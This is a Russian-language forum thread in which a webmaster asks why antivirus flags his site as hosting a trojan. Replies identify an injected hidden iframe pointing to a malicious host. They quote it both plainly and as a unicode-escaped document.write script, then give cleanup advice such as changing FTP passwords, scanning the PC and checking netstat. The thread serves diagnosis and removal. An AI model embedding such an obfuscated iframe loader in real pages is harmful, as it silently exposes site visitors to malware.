Поругали за то, что на сайте russkiy.net касперский метерится на обнаружение трояна.
Просмотрел код, попросил зайти других... Говорят что всё в норме, всё чисто.
Может ли кто-нибудь сказать истину и, если есть вредоносный код, помочь/подсказать удалить его.
Спасибо.

Поругали за то, что на сайте russkiy.net касперский метерится на обнаружение трояна.
Просмотрел код, попросил зайти других... Говорят что всё в норме, всё чисто.
Может ли кто-нибудь сказать истину и, если есть вредоносный код, помочь/подсказать удалить его.
Спасибо.

Внедрили следующее:

<iframe width=1 height=1 border=0 frameborder=0 src="http://scaned.info/tds/in.cgi?2"></iframe>

в коде это выглядить как:

<script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0077\u0069\u0064\u0074\u0068\u003d \u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u 003d\u0031\u0020\u0062\u006f\u0072\u0064\u0065\u00 72\u003d\u0030\u0020\u0066\u0072\u0061\u006d\u0065 \u0062\u006f\u0072\u0064\u0065\u0072\u003d\u0030\u 0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u00 74\u0070\u003a\u002f\u002f\u0073\u0063\u0061\u006e \u0065\u0064\u002e\u0069\u006e\u0066\u006f\u002f\u 0074\u0064\u0073\u002f\u0069\u006e\u002e\u0063\u00 67\u0069\u003f\u0032\u0022\u003e\u003c\u002f\u0069 \u0066\u0072\u0061\u006d\u0065\u003e')
</script>

Что делать? Для начала удалить этот script. Потом обследовать как они это внедрили и принять соотв. меры

1) Проверить персональный компьютер антивирусом. Вполне возможно что подцепили вирус.
2) Сменить пароли на доступ к фтп сервера и административную панель управления сайтом.
3) Заблокировать в межсетевом экране вредоносную ссылку.

Скрипт удалён. Есть вероятность что поломали пароль админки Джомлы.
Удалил скрипт, поменял пароль, удалил из списка зарегистрированных пользователей тех, кто вызывал подозрение.
По поводу своего компьютера, странно, но bin2 появлояется даже после после полного форматирования диска. Где он мог застрять - вопрос.
ftp-данные поменял. Прогнал по новой проверку на вирусы, ничего не выявил. Но, как я уже писал, программа bin2 не удаляется даже после форматирования.
Продолжаю искать причину.

По поводу своего компьютера, странно, но bin2 появлояется даже после после полного форматирования диска. Где он мог застрять - вопрос.
ftp-данные поменял. Прогнал по новой проверку на вирусы, ничего не выявил. Но, как я уже писал, программа bin2 не удаляется даже после форматирования.
Следовательно bin2 находится в какой-то из сохраннёных папок, и запускается, либо через внедрённый в другие программы код, либо через autorun в какой-то из папок.

от Джумлы пароли можешь не менять=)
1.[Для веб-рерсура] находишь комп, где нету вирусов и всякой гадости, и с этого компа меняешь пароли фтп для твоего сайта.

2.[Для заражённого компа] находишь комп, где установлен касперыч с последними базами(желательно 7 версии), подключаешь свой винт, и начинаешь сканить.

Следовательно bin2 находится в какой-то из сохраннёных папок, и запускается, либо через внедрённый в другие программы код, либо через autorun в какой-то из папок. Руслан, так я хард полностью, весь форматнул, разбил диск, систему поставил по новой. Установил дрова и спустя некоторое время на рабочем столе повляется гадкий bin2. Вот я и интересуюсь, куда он мог спрятаться? :)
Сейчас третий раз переустанавливал систему, пока что всё в норме... Может это прямая атака на мою машину? Может великий магистр шаманит там что-нибудь? :)

от Джумлы пароли можешь не менять=) Почему? На всякий пожарный пусть будет :)
1.[Для веб-рерсура] находишь комп, где нету вирусов и всякой гадости, и с этого компа меняешь пароли фтп для твоего сайта. Сделано...
2.[Для заражённого компа] находишь комп, где установлен касперыч с последними базами(желательно 7 версии), подключаешь свой винт, и начинаешь сканить. Сделано...
Обнаруженых вирусов - 0.
Но что-то всё-равно страшно. :)

Обнаруженых вирусов - 0.
странно...
антивирь какой?

Еще посоветую после каждой связи по ФТП менять пароли или в ФТП-клиенте или в Плеске на доступ по ФТП. Так как комп сам конектится и что-то сам меняет на сервере, причем антивирус эту фигню не ловит.

Еще посоветую после каждой связи по ФТП менять пароли или в ФТП-клиенте или в Плеске на доступ по ФТП. Так как комп сам конектится и что-то сам меняет на сервере, причем антивирус эту фигню не ловит.

пароли скорей всего уходят в ботнет, а там уже масссивно внедряют код

Просмотрел код, попросил зайти других... Говорят что всё в норме, всё чисто. А из них никто антивирусом не пользуеться чтоли? :) Тогда скорее всего они тоже уже подцепили этого троянчика.

простой способ проверить
подключитесь к и-нету , и сморите идёт ли исход. и входящий траффег

простой способ проверить
подключитесь к и-нету , и сморите идёт ли исход. и входящий траффег
Трафик будет по любому идти. Не зависимо от того, есть вирусы или нет. Надо ставить брандмауэр, но даже это не панацея.

каким это образом будет идти траффик? если в нет никто не ломицца?

К примеру, svchost все время со штаб-квартирой перестукивается, даже если апдейты отключены, естественно, Windows Firewall пропускает "своих" молча.

незнаю как у вас, но у меня явно можно понять что сетевой активности нету, может из-за тонкой настройки виндовс?)

2автору
если всё трафф идёт, и вы не можете понять вирус это или нет делаете следующее...
пуск » Выполнить » набираете "cmd" Без кавычек, появится коммандная строка. В ней набираете "netstat" Без кавычек.Если вы увидели множество соединений, тем более по smtp протоколу, начит вашим компом орудует вирус:)

Да нет, вроде-бы тишина... Избавился вроде. Нет ни на ПК, ни на сайте по всей видимости.

Я с ума сойду, если мне не помогут!
Что за фигня?! Не могу залить на сервак ни одного файла, на сайт разместить ни одного материала, и на сайте открыть материалы для полного просмотра... Что за глюКъ?
Может ли это зависить от Агавы?
Спасибо.

Что за фигня?! Не могу залить на сервак ни одного файла, на сайт разместить ни одного материала, и на сайте открыть материалы для полного просмотра... Что за глюКъ?
Может ли это зависить от Агавы?
Может. Чем заливаешь? Попробуй Total Commander'ом. У меня недавно был глюк с mchost'ом, когда файлы заливались только с TotalCMD (в активном режиме).

Ilya, межсетевой экран устанавливал на компьютер?